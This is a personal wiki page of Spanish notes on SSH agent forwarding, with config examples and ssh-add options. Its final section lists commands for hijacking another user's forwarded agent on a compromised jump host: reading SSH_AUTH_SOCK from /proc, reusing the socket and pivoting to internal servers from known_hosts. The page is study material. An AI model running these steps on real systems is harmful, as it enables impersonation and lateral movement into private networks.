Mostra la pàginaRevisions anteriorsQuè hi enllaçaExporta a PDFTorna dalt Aquesta pàgina és només de lectura. Podeu veure'n el codi font, però no podeu canviar-la. Consulteu el vostre administrador si penseu que això és degut a algun error. = agente SSH == ssh-agent (port forwarding) * [[https://deephacking.tech/ssh-agent-hijacking-linux/]] * {{:linux:ssh:pasted:20250527-054104.png?700}} * <code ; ~/.ssh/config> Host dmz HostName dmz User alice ForwardAgent yes </code> * Acceso ordenador DMZ (intermedio):<code bash>ssh dmz # ssh -i ~/.ssh/clave_privada -A user@host</code> * <code ; ~/.ssh/config>Host internalserver HostName 192.168.10.30 User alice ProxyJump dmz ForwardAgent yes </code> * Acceso ordenador interno a través del intermedio:<code bash>ssh internalServer</code> * Si**ForwardAgent** està deshabilitado no se puede. * verificar * <code ; ~/.ssh/config> </code> == opciones * ''ssh-add <clave>'' : añade la clave indicada para su uso (si tiene contraseña, nos la pedirá al usar) * ''-t <segundos>'' : duración de la identidad en el agente * ''ssh-add -K <clave>'' : añade permanentemente la clave para su uso * ''ssh-add -L'' : lista las claves públicas de las claves existentes * ''ssh-add -l'' : lista las claves * ''ssh-add -d <clave>'' : elimina la clave * ''-D'' : elimina todas las claves * ''ssh-add -x'' : bloquea agente * ''-X'' : desbloquea agente == comprometer el servidor intermedio * entrar como root * mirar usuarios del sistema * mirar si tienen procesos SSH abiertos:<code bash>pstree -p <USER> | grep ssh</code> * mirar variables del entorno del usuario:<code bash>cat /proc/<PID>/environ | tr '\0' '\n' | grep SSH_AUTH_SOCK</code> * mirar a quien corresponde el socket (root): <code bash>SSH_AUTH_SOCK=/tmp/ssh-XXXX41DN9o/agent.46200 ssh-add -l</code> * mirar ordenadores remotos del usuario: <code bash>cat /home/<USER>/.ssh/known_hosts</code> * probar la conexión con esos servidores:<code bash>SSH_AUTH_SOCK=/tmp/ssh-XXXX41DN9o/agent.46200 ssh alice@internalserver</code> linux/ssh/agente.txt Darrera modificació: 27/05/2025 05:41per mate